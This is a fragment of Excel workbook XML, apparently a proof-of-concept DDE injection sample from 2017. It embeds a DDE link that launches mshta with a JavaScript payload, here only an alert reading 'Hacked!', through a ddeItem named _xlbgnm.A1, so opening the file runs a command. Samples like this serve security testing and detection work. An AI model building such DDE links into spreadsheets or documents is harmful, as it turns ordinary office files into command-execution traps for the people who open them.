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teixeira\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="23040" windowHeight="9384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c mshta javascript:alert(&quot;Hacked!&quot;);close();">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1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e">
        <f>[1]!_xlbgnm.A1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danielteixeira</dc:creator>
  <cp:lastModifiedBy>danielteixeira</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-15T11:09:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-15T11:40:13Z</dcterms:modified>
</cp:coreProperties>
</file>